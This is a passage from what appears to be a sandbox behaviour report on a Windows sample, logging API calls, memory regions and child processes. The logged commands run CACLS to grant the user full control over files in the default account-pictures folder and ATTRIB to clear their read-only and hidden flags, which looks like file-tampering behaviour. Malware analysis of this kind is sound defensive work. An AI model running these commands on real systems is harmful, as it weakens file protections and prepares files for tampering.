Pictures\\usertile36.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af1f0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"", lpProcessInformation=0x1af1f0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x8cc, dwThreadId=0x83c)) returned 1 [0188.851] CloseHandle (hObject=0x50) returned 1 [0188.851] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.851] GetEnvironmentStringsW () returned 0x302410* [0188.851] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0188.851] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0189.082] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af0e4 | out: lpExitCode=0x1af0e4*=0x0) returned 1 [0189.082] CloseHandle (hObject=0x4c) returned 1 [0189.082] _vsnwprintf (in: _Buffer=0x1af22c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af0f0 | out: _Buffer="00000000") returned 8 [0189.082] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.082] GetEnvironmentStringsW () returned 0x302410* [0189.082] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0189.082] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.082] GetEnvironmentStringsW () returned 0x302410* [0189.082] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0189.082] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af148 | out: lpAttributeList=0x1af148) [0189.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.082] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.083] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.083] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.083] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.083] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.083] SetConsoleInputExeNameW () returned 0x1 [0189.083] GetConsoleOutputCP () returned 0x1b5 [0189.083] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.083] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.083] exit (_Code=0) Process: id = "407" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0x7dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "406" os_parent_pid = "0x9c8" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27440 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27441 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27442 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27443 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 27444 start_va = 0xad0000 end_va = 0xad8fff entry_point = 0xad0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27445 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27446 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27447 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27448 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 27449 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27450 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27451 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27452 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27453 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27454 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 27455 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27456 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27457 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27458 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27459 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27460 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27461 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 579 os_tid = 0x8a0 Thread: id = 580 os_tid = 0x6dc Process: id = "408" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0x8cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "406" os_parent_pid = "0x9c8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27462 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27463 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27464 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27465 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 27466 start_va = 0xfe0000 end_va = 0xfe6fff entry_point = 0xfe0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27467 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27468 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27469 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27470 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27471 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27472 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27473 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27474 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27475 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 27476 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 27477 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27478 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27479 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27480 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27481 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27482 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27483 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27484 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27485 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27486 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27487 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27488 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27489 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 27490 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27491 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 581 os_tid = 0x83c Process: id = "409" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x114" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27492 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27493 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27494 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27495 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27496 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27497 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27498 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27499 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27500 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 27501 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27502 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27503 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27504 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27505 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 27506 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 27507 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27508 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27509 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27510 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27511 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27512 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27513 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27514 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27515 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27516 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27517 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27518 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27519 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 27520 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 27521 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 27522 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 27523 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 27524 start_va = 0x500000 end_va = 0x662fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 27525 start_va = 0x6e0000 end_va = 0x12dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 27526 start_va = 0x12e0000 end_va = 0x15aefff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 582 os_tid = 0x748 [0189.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efe64 | out: lpSystemTimeAsFileTime=0x2efe64*(dwLowDateTime=0xa5a30ce0, dwHighDateTime=0x1d440a9)) [0189.134] GetCurrentProcessId () returned 0x114 [0189.134] GetCurrentThreadId () returned 0x748 [0189.134] GetTickCount () returned 0x35ec2 [0189.134] QueryPerformanceCounter (in: lpPerformanceCount=0x2efe5c | out: lpPerformanceCount=0x2efe5c*=24592349408) returned 1 [0189.135] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0189.135] __set_app_type (_Type=0x1) [0189.135] __p__fmode () returned 0x76b331f4 [0189.135] __p__commode () returned 0x76b331fc [0189.135] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0189.135] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0189.135] GetCurrentThreadId () returned 0x748 [0189.135] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x748) returned 0x38 [0189.136] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.136] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0189.136] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.136] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0189.136] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efdf4 | out: phkResult=0x2efdf4*=0x0) returned 0x2 [0189.136] VirtualQuery (in: lpAddress=0x2efe2b, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.136] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0189.136] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0189.136] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.136] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0189.136] GetConsoleOutputCP () returned 0x1b5 [0189.136] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.136] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0189.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.136] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0189.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.137] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.137] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.137] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.137] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.137] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.137] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.137] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0189.137] GetEnvironmentStringsW () returned 0x410308* [0189.137] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0189.137] GetEnvironmentStringsW () returned 0x410308* [0189.137] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0189.138] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed64 | out: phkResult=0x2eed64*=0x40) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0xb8, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x1, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x1, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x0, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x40, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x40, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x40, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegCloseKey (hKey=0x40) returned 0x0 [0189.138] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed64 | out: phkResult=0x2eed64*=0x40) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, 